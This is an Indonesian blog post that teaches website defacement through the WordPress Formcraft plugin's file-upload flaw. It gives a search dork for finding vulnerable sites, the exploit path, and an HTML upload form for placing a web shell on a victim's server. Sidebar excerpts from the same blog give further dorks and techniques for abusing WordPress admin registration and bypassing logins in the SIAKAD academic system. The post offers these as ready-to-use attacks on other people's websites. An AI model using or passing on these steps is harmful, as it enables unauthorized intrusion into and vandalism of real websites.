Deface web dengan metode WP-Plugins Formcraft

Assalamualikum
Marhaban Ya Ramadhan
Gak terasa udah memasuki bulan puasa Ramadhan

Sebelumnya _MisterNotFound_ mohon maaf ya jika ane punya banyak salah :v
Dan semoga puasa kalian lancar dan barokah, Amiin :)
Langsung aja dehh :D

Shortcut : Click Here for Tutorial on Youtube

BAHAN :

   1. DORK : inurl:/wp-content/plugins/formcraft/file-upload/
   2. EXPLOIT : /wp-content/plugins/formcraft/file-upload/server/php/upload.php
   3. CSRF 
<form method="POST"
action="http://FUCK.yu/wp-content/plugins/formcraft/file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Hajar...!!!</button>
</form>
  4.  Handsome B-)

 
POC :
   1. Agar varokah, dorking dulu lah :D Whatever, pake bing atau google :) 
 


   2.  Choose your target, men. And this is my FUCKIN target :D
  


3. Masukkan exploit nya di belakang Url target anda. Dan jika vuln maka penampakan nya seperti ini









 4. Go to your CSRF, men . Lalu edit lah seperti ini, dan klik SAVE








5. Culik CSRF nya ke browser yang anda gunakan. Atau biar lebih simpel buka CSRF nya :D



6. Upload your FUCKIN Shell, dude



7. Penampakan Shell yang berhasil di unggah







8. Are you KIDDING me ?????
 

Comments

Post a Comment

Popular posts from this blog

Deface Teknik WP Add Admin Vulnerability

Image
Assalamualaikum sobat NOT_FOUND yang berbahagia :) (DI REVISI) Pagi yang mendung ini, saya mau ngasih tutor nih. Merubah halaman depan website dengan teknik WP-Login + Login as Admin. Perlu di perhatikan masbro, teknik ini hanya bisa dilakukan jika website tersebut menggunakan CMS Wordpress.  Sekedar info, bahwa teknik ini memanfaatkan plugin kerentanan Add admin/Register New Admin  pada direktori  wp-login.php?action=register Kelebihan tutor saya kali ini yaitu bisa menebas index (halaman awal website) tanpa harus pake Shell :) Sebenarnya ini teknik lama, tapi karena jarang di publish dan jarang banget ditemukan di google, akhirnya saya publish artikel ini dengan senang hati :v Ok, langsung caw sobat ;) Shortcut :   Click Here for Tutorial on Youtube 1. DORK UMUM: inurl:/wp-login DORK KEMBANGAN SAYA : Inurl: /wp-login.php?action=register Inurl:/register-2/ 2. Exploit : wp-admin/theme-editor.php 3. POC : - Pergi ke mbah google, lalu masukkan dork tersebut ke dal...
Read more

Deface Web Metode Bypass Admin on CMS SIAKAD

Image
Hay gan-sist Meet again nih dengan admin ganteng, hehe Di artikel ini kita akan mempelajari ilmu para script kiddies , yaitu Deface Web. Tepatnya, disini lo akan mempelajari Deface web dengan teknik bypass admin pada CMS SIAKAD (Sistem Informasi Akademik) Oiya, sebelumnya Taqqobalallohu Mina Wa Minkum , Mohon maaf lahir batin guys. Maapin gua kalo gua punya banyaaakkk salah ke lo semua, termasuk para admin web yang web-nya pernah gua anu anu hehe ;) Maapin gua juga kalo gua jarang post, hehe. Ojo lali sundul THR nya ke gua yo wkwk :p Oke oke, gak usah banyak cincong lagi, langsung otw ke topik pembahasan.. Shortcut : Click Here For Watch Tutorial Video on Youtube [+] Sesajen : 1. Dork : /?mnux=login&lgn=frm siakad inurl:"?mnux=" intext:siakad inurl:"?mnux=" intext:akademik inurl:"?mnux=" intext:sisfo inurl:"?mnux=" site:id inurl:"?mnux=" site:com inurl:"?mnux=" site:net  NOTE : Pilih salah satu dork nya mbah  2. Exploit : ...
Read more

Mengejutkan Serangan DI London sudah diprediksi diforum 4chan Anonymous

Image
Sebuah posting-an di forum online diduga memprediksi serangan teror di Gedung Parlemen Inggris. Serangan di jantung Kota London itu menyebabkan setidaknya lima orang tewas. Sebagaimana dikutip dari Independent isu serangan tersebut disebut muncul di forum 4Chan (forum utama Anonymous). Pada posting-an di forum tersebut muncul referensi mengenai lokasi serangan serta gambar dua senjata api. Namun apakah serangan tersebut memiliki hubungan dengan posting itu masih belum dapat terkonfirmasi. Sebab tidak ada referensi tanggal tepat serta bagaimana serangan itu akan terjadi. Kabar terkait hubungan posting di 4Chan tersebut dengan serangan teror di London pertama kali dihubungkan oleh netizen  yang mengklaim keduanya berhubungan. Independent mewartakan, referensi mengenai lokasi serangan teror di London juga muncul di posting-an tersebut. Sebab selain gambar dua senjata api, sang pengunggah juga memunculkan sejumlah gambar titik dan garis pemisah yang dapat diartikan menggunakan ...
Read more